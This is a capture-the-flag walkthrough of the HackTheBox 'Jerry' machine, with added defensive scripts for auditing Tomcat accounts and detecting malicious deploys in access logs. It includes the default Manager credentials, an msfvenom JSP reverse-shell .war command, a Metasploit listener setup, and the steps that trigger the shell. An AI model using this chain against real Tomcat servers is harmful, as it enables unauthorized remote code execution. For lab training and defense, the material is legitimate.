Jerry

Walkthrough


OS: Windows
Difficulty: Easy
Points: 20
Release: 30 jun 2018
IP: 10.10.10.95

0xL1NK#~ HackTheBox.eu


  Description

  Jerry was one of the easiest boxes I've done so far. It was very straightforward with no rabbit holes. Unfortunately there was no privilege escalation, as the user and root flags were together in the same file.

  Recon

    Nmap

    As always, we start out with some recon of the box. The default go-to tool is Nmap, to find open ports and their services:


      Used command:

      root@kali:~/Documents/htb/Jerry# nmap -sC -sV -oA jerry 10.10.10.95

      Output:

      Starting Nmap 7.60 ( https://nmap.org ) at 2018-11-09 21:18 CET
      Nmap scan report for 10.10.10.95
      Host is up (0.044s latency).
      Not shown: 999 filtered ports
      PORT     STATE SERVICE VERSION
      8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
      |_http-favicon: Apache Tomcat
      |_http-open-proxy: Proxy might be redirecting requests
      |_http-server-header: Apache-Coyote/1.1
      |_http-title: Apache Tomcat/7.0.88

      As we can see, port 8080 is open, and is running Apache Tomcat 7.0.88. Surfing to the web page, we are presented with a default Tomcat page. Next, we want to enumerate the website for directories and/or possible vulnerabilities. A nice tool to do this with is Nikto.


    Nikto

    Used command:

      root@kali:~/Documents/htb/Jerry# nikto -h 10.10.10.95 -p 8080

      Output:

      - Nikto v2.1.6
      ---------------------------------------------------------------------------
      + Target IP:          10.10.10.95
      + Target Hostname:    10.10.10.95
      + Target Port:        8080
      + Start Time:         2018-11-09 21:31:42 (GMT1)
      ---------------------------------------------------------------------------
      + Server: Apache-Coyote/1.1
      + The anti-clickjacking X-Frame-Options header is not present.
      + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
      + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
      + No CGI Directories found (use '-C all' to force check all possible dirs)
      + Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0xW/21630 0x1525691762000
      + OSVDB-39272: favicon.ico file identifies this server as: Apache Tomcat
      + Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
      + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
      + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
      + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
      + /examples/servlets/index.html: Apache Tomcat default JSP pages present.
      + OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
      + Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.
      + /host-manager/html: Default Tomcat Manager / Host Manager interface found
      + /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
      + /manager/status: Tomcat Server Status interface found (pass protected)
      + 7605 requests: 0 error(s) and 14 item(s) reported on remote host
      + End Time:           2018-11-09 21:38:46 (GMT1) (424 seconds)
      ---------------------------------------------------------------------------
      + 1 host(s) tested

      Nikto found some default login credentials on 10.10.10.95:8080/manager/html

      Username: tomcat

      Password: s3cret


      With these credentials we got access to the Tomcat manager page, where we can upload .war files. We can use msfvenom to generate a .war shell that we can upload here.
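The root cause here is a Manager account with a default password, which lives in Tomcat's conf/tomcat-users.xml. The audit script below is an added example (not part of the original walkthrough) that parses that file and flags privileged accounts using known default credential pairs, short passwords, or the manager-gui/manager-script role combination Tomcat's own documentation warns against. The sample XML is constructed to mirror the tomcat/s3cret finding above; the KNOWN_DEFAULTS list is an assumed starting point, and digested (hashed) passwords will not match it.

```python
import xml.etree.ElementTree as ET

# Roles that grant access to the Manager / Host Manager web applications.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                    "admin-gui", "admin-script"}
# Assumed list of credential pairs commonly left in place from docs, examples or labs.
KNOWN_DEFAULTS = {("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"),
                  ("admin", ""), ("tomcat", "")}

# Constructed sample tomcat-users.xml: the first account mirrors the Nikto finding above.
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="deployer" password="Xq7!mV2#kLp9wRt4" roles="manager-script"/>
  <user username="ops" password="Long-enough-passphrase-1" roles="manager-gui,manager-script"/>
  <user username="guest" password="guest" roles="role1"/>
</tomcat-users>
"""

def audit_tomcat_users(xml_text, min_len=12):
    """Return a list of (username, reason) findings for accounts holding privileged roles."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if elem.tag.split("}")[-1] != "user":   # strip the XML namespace before comparing
            continue
        name = elem.get("username") or elem.get("name") or ""   # Tomcat accepts both attributes
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        if not roles & PRIVILEGED_ROLES:
            continue   # unprivileged accounts cannot reach the Manager; out of scope
        if (name, password) in KNOWN_DEFAULTS:
            findings.append((name, "default credential pair"))
        elif len(password) < min_len:
            findings.append((name, "short password on privileged account"))
        if {"manager-gui", "manager-script"} <= roles:
            # The script interface has no CSRF protection, so combining it with the GUI role
            # lets a CSRF against the browser session reach the deploy API.
            findings.append((name, "manager-gui and manager-script combined on one account"))
    return findings

if __name__ == "__main__":
    for user, reason in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user}: {reason}")
```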

  Exploitation

  After the shell is uploaded it can be executed, and it will connect back to our listener.

    Generating the shell

    Create the .war file with msfvenom. The shell we are going to use is a reverse JSP TCP shell.


      Command used:

      msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your ip> LPORT=<port> -f war > reverseshell.war

      The .war file generated by msfvenom contains the backdoor as a JSP file with a randomly generated name. This is the file we will browse to after the .war file has been uploaded; requesting it establishes the reverse connection to our Kali machine. We cannot browse to this file without knowing its name, so we list the archive's contents to get the filename:

      Command used:

      root@kali:~/Documents/htb/Jerry# jar -xvf reverseshell.war

      Output:

        created: WEB-INF/
       inflated: WEB-INF/web.xml
       inflated: djkwbjspxeqxnor.jsp

      According to the output, the filename is djkwbjspxeqxnor.jsp.


    Setting up our listener

    Next we want to set up our listener for the incoming connection. We will use Metasploit's multi/handler for this.


      Commands used:

      root@kali: msfconsole
      msf > use exploit/multi/handler
      msf > set payload java/jsp_shell_reverse_tcp
      msf > set LHOST <local IP>
      msf > set LPORT <local port>
      msf > set ExitOnSession false
      msf > exploit -j

      The -j parameter runs the handler as a background job, so the console stays usable while it waits and any session that connects lands in the background; ExitOnSession false keeps the handler listening after a session arrives.


    Upload the shell to Tomcat

    Log in with the default credentials on the Tomcat Manager page, and upload your .war file.


    Execute the payload

    To execute the payload and make it connect back to our listener, we must browse to the .jsp file we generated in step 1. The URL to browse to will be:

      http://10.10.10.95:8080/<Name of .war file>/<Name of .jsp file>

      http://10.10.10.95:8080/reverseshell/djkwbjspxeqxnor.jsp

      Back on Kali, we are presented with an Administrator shell. We can now read the file that contains both user.txt and root.txt.

      C:\Users\Administrator\Desktop\flags>more "2 for the price of 1.txt"
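The whole chain above leaves a distinctive trace in Tomcat's access log: a successful Manager deploy, followed shortly by a request for a JSP at the root of a context that had never been requested before. The detector below is an added example (not part of the original walkthrough) that runs that logic over constructed log lines in the default AccessLogValve pattern (%h %l %u %t "%r" %s %b); the client IPs, timestamps and the earlier /examples request are constructed, the latter to show that a JSP hit in an already-known context does not alert.

```python
import re
from datetime import datetime, timedelta

# Default AccessLogValve pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Deploy endpoints of the HTML interface, the text interface and the legacy path.
DEPLOY_RE = re.compile(r'^/manager/(html/upload|text/deploy|deploy)(\?|$)')
# A JSP sitting directly under a context root, e.g. /reverseshell/djkwbjspxeqxnor.jsp
CONTEXT_JSP_RE = re.compile(r'^/([^/?]+)/([^/?]+\.jsp)(\?|$)')

# Constructed log lines mirroring the walkthrough: scan, Manager login, upload, JSP hit.
SAMPLE_LOG = """\
10.10.14.5 - - [09/Nov/2018:21:33:10 +0100] "GET /examples/servlets/index.html HTTP/1.1" 200 6594
10.10.14.5 - - [09/Nov/2018:21:39:50 +0100] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - tomcat [09/Nov/2018:21:39:55 +0100] "GET /manager/html HTTP/1.1" 200 14583
10.10.14.5 - tomcat [09/Nov/2018:21:40:12 +0100] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 200 13201
10.10.14.5 - - [09/Nov/2018:21:40:30 +0100] "GET /reverseshell/djkwbjspxeqxnor.jsp HTTP/1.1" 200 -
10.10.10.20 - - [09/Nov/2018:21:41:02 +0100] "GET /examples/jsp/snp/snoop.jsp HTTP/1.1" 200 1152
"""

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def detect_deploy_then_jsp(log_text, window=timedelta(minutes=10)):
    """Return (deployer_user, deployer_ip, requester_ip, context, jsp) for every request to
    a root-level JSP in a previously unseen context within `window` of a successful deploy."""
    alerts, deploys, known_contexts = [], [], set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if DEPLOY_RE.match(rec["path"]) and rec["status"] == 200:
            deploys.append(rec)            # successful deploy via HTML or text interface
            continue
        jsp = CONTEXT_JSP_RE.match(rec["path"])
        if jsp and jsp.group(1) not in known_contexts:
            recent = [d for d in deploys if timedelta(0) <= rec["ts"] - d["ts"] <= window]
            if recent:
                d = recent[-1]             # attribute to the most recent deploy
                alerts.append((d["user"], d["ip"], rec["ip"], jsp.group(1), jsp.group(2)))
        segments = rec["path"].split("?")[0].split("/")
        known_contexts.add(segments[1] if len(segments) > 1 else "")
    return alerts
```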

** For more information, check out the extra links and sources. **
